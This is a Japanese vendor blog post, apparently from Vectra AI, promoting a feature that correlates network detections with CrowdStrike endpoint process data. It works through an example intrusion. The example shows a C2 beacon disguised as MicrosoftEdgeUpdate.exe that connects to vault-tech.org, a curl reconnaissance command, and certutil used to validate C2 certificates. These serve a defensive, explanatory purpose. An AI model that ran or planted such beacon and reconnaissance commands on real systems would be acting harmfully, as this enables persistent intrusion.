AI企業のセキュリティ確保:制御を失わずにAIを活用する当社のCEOの見解
ブログを読む

AIエンタープライズのセキュリティ確保: 制御を失わずにAIを活用する当社のCEOの見解ブログを読む →

Vectra AI、2025年ガートナーのネットワーク検知とレスポンス(NDR)のマジック・クアドラントにおいてリーダーの1社に
ハンバーガー・アイコン・トップライン
ハンバーガーアイコン中線
ハンバーガーアイコン
Vectra AIプラットフォーム

Vectra AIがネットワーク検知をエンドポイントプロセスに自動的に接続する方法

2025年12月11日
Dale O’Grady
コンペティティブ・インテリジェンス
Vectra AIがネットワーク検知をエンドポイントプロセスに自動的に接続する方法

「何が起きたのか」を探し回るのではなく瞬時に見つける

不審なアクティビティが現れたとき、すべてのアナリストが最初に問うのは「何がこれを引き起こしたのか?」ということです。

その答えがなければ、調査は停滞します。アナリストは複数のコンソールを行き来し、エンドポイントのテレメトリを探し、タイムスタンプを突き合わせ、コンテキストを手作業でつなぎ合わせます。数分が数時間に変わります。その間にも、攻撃者はラテラルムーブを行い、データを流出させ、永続化を確立します。

これが、ネットワーク検知とエンドポイント理解の間にあるギャップ であり、脅威が優位に立ってしまうポイントです。

ネットワークとエンドポイントの間の欠落したリンク

ネットワーク検知とレスポンス (NDR) は、不審な振る舞い (C2、偵察、ラテラルムーブメント、データ流出) の検知に優れています。しかし、ネットワークテレメトリだけでは、その挙動をエンドポイント上のどのプロセスが開始したのかまでは分かりません。

それは正規のブラウザセッションなのか?PowerShell スクリプトなのか?それとも隠れたマルウェア実行ファイルなのか?

エンドポイント検知とレスポンス (EDR) はプロセスレベルの詳細を捉えますが、ネットワークアクティビティと相関しなければ、アナリストは手動でギャップを埋める必要があります。たとえば CrowdStrike を検索し、同時刻付近のプロセスを探し、原因を特定しようとします。

この手動での相関作業は時間がかかり、エラーが発生しやすく、規模が大きくなると持続不可能です。

EDR自動プロセス相関機能のご紹介

Vectra AI の最新機能 EDR Process Correlation は、この調査上の摩擦を完全に解消し、コンテキスト化を強化します。

仕組みは次の通りです。

Vectra AI が不審なネットワーク挙動を特定すると、該当ホストに対して CrowdStrike のテレメトリを自動的に照会し、プロセスアクティビティを分析して、検知を引き起こした可能性が最も高いプロセスを特定します。

結果:瞬時に自動で返答が得られる

アナリストは、Vectra AI の検知画面内で完全なプロセスコンテキストを直接確認できます。

可能性の高いプロセス
MicrosoftEdgeUpdate.exe

プロセス作成時間
2025-11-29T03:58:42Z

コマンドライン
"C:\ProgramData\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" --connect vault-tech.org:443 --interval 300 --retry infinite

SHA256
c7e9a4b2f8d6c5e3a1f7d9b4c2e8a6f5d3b1c9e7a5f3d1b8c6e4a2f9d7b5c3e1

ファイルパス
\Device\HarddiskVolume2\ProgramData\Microsoft\EdgeUpdate\

アカウント名
NT AUTHORITY\SYSTEM

親プロセス
services.exe (PID: 668)

数秒で、アナリストは全容を把握する:

  • 実行内容:Microsoft Edgeのアップデータに偽装した持続メカニズム
  • 実行時:タイムライン相関のための正確なプロセス作成タイムスタンプ
  • 実行内容:コマンドラインから、C2 ドメイン (vault-tech.org)、5 分間隔のビーコン、無限リトライが判明
  • 存在場所:正規のMicrosoftフォルダパスに偽装して隠されている
  • 実行主体:SYSTEMアカウント:持続性とラテラルムーブのための最大権限
  • 発生原因:services.exe は、このマルウェアが Windows サービスとして登録されたことを示しています
  • 脅威インテリジェンス:SHA256ハッシュによる即時レピュテーションチェックと脅威フィード相関分析に対応

一見すると、これは通常の Microsoft ソフトウェアに見えます。しかし、コマンドラインが真実を語ります。SYSTEM 権限で 5 分ごとに通信する、永続的な C2 ビーコンが、正規のアップデーターを装って動作しているのです。

この コマンドライン情報だけで、「潜在的に不審なネットワークトラフィック」は、「即時の封じ込めが必要な、確認済みの永続的脅威」へと変わります。これは、自動的に提供される“調査の金鉱”です。

さらに、ワンクリックで CrowdStrike にピボットし、完全なプロセスツリーとフォレンジックタイムラインを直接確認できます。

手動検索は不要。コンソール切り替えも不要。推測も不要。

数時間から数秒へ:SOC チームへの実際の効果

EDR Process Correlation 導入前:

  1. アナリストがVectra AIネットワーク検知を受信
  1. 影響を受けたホストを特定する
  1. CrowdStrikeコンソールを開く
  1. 検出時間枠周辺のプロセス検索
  1. ネットワークのタイムスタンプとプロセス活動を関連付ける
  1. どのプロセスが責任を負うかを検証する
  1. 平均所要時間:1回の検出につき15~30分

EDR Process Correlation 導入後:

  1. アナリストは、既に特定されたプロセスと共にVectra の検知結果を受け取る
  1. 強化されたコンテキストを画面内で確認
  1. 必要に応じて CrowdStrike に直接クリック
  1. 平均時間:30~60秒

調査時間を 95% 削減。しかも、これは毎日、すべての検知で積み重なります。

単一プロセスを超えて:検知から全社的なハントへ

EDR Process Correlation は、単に原因プロセスを特定するだけではありません。初期トリアージから、エンタープライズ全体にわたる脅威ハンティングまで、完全な調査ワークフローを提供します。

即時コンテキスト:Show More Processes

Show More Processes をワンクリックすると、検知ウィンドウ内のすべてのプロセスアクティビティが表示されます。この例では、プロセス一覧の確認により、攻撃の全体的な進行が明らかになります。

  1. msedge.exe:フィッシングクリックによる初期侵入
  1. curl.exe:Reconnaissance: curl.exe -I https://vault-tech.org --connect-timeout 5
    攻撃者は永続化に移る前に C2 への到達性を確認。接続タイムアウト付きの HEAD リクエストは、慎重な運用セキュリティを示します。
  1. certutil.exe:C2インフラストラクチャを検証するためのSSL検証
    ファイルダウンロードの典型的な悪用とは異なり、ここではcertutilがC2の証明書チェーンを検証し、暗号化されたトンネルがSSL警告や信頼エラーを引き起こさないことを保証します。これにより、ユーザーやセキュリティツールへの警告が発生する可能性が低減されます。
  1. MicrosoftEdgeUpdate.exe:5分間隔のビーコン付き持続的C2トンネル
    攻撃者はインフラストラクチャの到達可能性とSSLの有効性を確認した後、5分間隔でビーコンを送信するインプラントを確立します。

より深いホスト調査:ワンクリックで CrowdStrike へ移動

同じインターフェースから、CrowdStrikeの「ホストの調査」機能はFalcon内の完全なホストタイムラインに直接開きます。アナリストは検知ウィンドウの前後にあるプロセスを確認するため、即座に時間枠を拡張できます。手動でのホスト検索もAID検索も不要で、完全なホストコンテキストに即時アクセス可能です。

数日前に偵察があったのか?別のツールで再侵入したのか?その答えは、すぐ目の前にあります。

全社的ハンティング:事前構築された脅威インテリジェンスクエリ

真価を発揮するのは Run Query in CrowdStrike です。関連するすべての指標が事前に埋め込まれた、洗練された Falcon NGSIEM クエリが生成されます。

  • リモートIPアドレス
  • SHA256ハッシュ
  • コマンドラインパターン
  • プロセス実行特性
  • ネットワーク接続の詳細

このクエリを手動で作るには、熟練アナリストでも 10~15 分かかります。Vectra AI はそれを即座に提供し、環境全体で実行できる状態にします。

ユースケース例:デフォルトではこのホストにスコープされていますが、ホストフィルターを外すだけで、次を即座にハントできます。

  • vault-tech.org に接続するその他のエンドポイント
  • 同じ悪意のあるハッシュを実行している他のシステム
  • 関連するキャンペーンを示す類似のコマンドラインパターン

これにより、単一ホストの検知が数秒で企業全体の脅威インテリジェンスへと変換されます。

特に、NDR が検知したが EDR がフラグしなかった活動において、この機能は強力です。プロセスレベルでは巧妙に紛れ込んでいても、ネットワーク挙動が攻撃者を露呈させます。EDR Process Correlation は、そのギャップを瞬時に埋め、何が起きたのかだけでなく、攻撃の完全な進行を示します。

この例の実例をご覧ください。

実世界の調査のために構築

インテリジェントなタイムスタンプ相関と確率的なプロセスマッチングにより、Vectra AI の EDR Process Correlation は、現代のエンドポイントの複雑性を自動的に処理します。

  • マルチプロセス環境:数十のプロセスが同時に実行されている場合でも、正しいプロセスを特定
  • 子プロセスチェーン:親子関係を通じてアクティビティを遡って追跡することを可能に
  • 短命プロセス:短時間で実行・終了するプロセスであってもコンテキストを捕捉
  • 暗号化通信:ペイロード検査が不可能な場合でも、ネットワーク動作とプロセスを関連付ける

このインテリジェンスにより、セキュリティワークフロー全体で、より迅速で確信のある意思決定が可能になります。

完全な可視性と統合レスポンス

EDR Process Correlation は、CrowdStrike との包括的な統合の一部として、エンドツーエンドの脅威可視性を提供します。

  1. 資産のコンテキスト化: CrowdStrike管理のエンドポイントは、OS、センサーID、Vectra 自動的に識別される
  1. EDR Process Correlation:プロセステレメトリはネットワーク検知と自動的に相関付けられる
  1. 自動レスポンス:CrowdStrike の API を通じて、ホスト封じ込めをトリガー可能

これらが連携することで、初期プロセス実行からネットワーク拡散まで、完全な攻撃ストーリー を手動介入なしで把握できる統合防御が実現します。

なぜ今これが重要なのか

攻撃者は、検知を回避するために、エンドポイント技術とネットワーク移動をますます組み合わせています。エンドポイントに投下されたマルウェアは、その場に留まりません。C2 にビーコンし、横断移動し、ネットワーク全体でデータを流出させます。

防御も同じように流動的でなければなりません。

エンドポイントのプロセスコンテキストをネットワーク検知に自動的に結び付けることで、Vectra AI と CrowdStrike は、完全な攻撃チェーンを即座に可視化 します。アナリストは、最初のアラートからクロスドメイン全体の状況を把握できます。ピボット不要。遅延なし。盲点なし。

EDR Process Correlation の実動を見る

Vectra AI がどのようにネットワーク検知の起点となるプロセスを自動特定し、CrowdStrike でのワンクリック調査を可能にするのかをご覧ください。

脅威調査を加速させる準備はできていますか?

Vectra AI と CrowdStrike の統合、および EDR Process Correlation がどのように即時のコンテキストを提供し、より迅速で確信ある対応を実現するのかをご確認ください。

[統合を探る →]  

よくあるご質問(FAQ)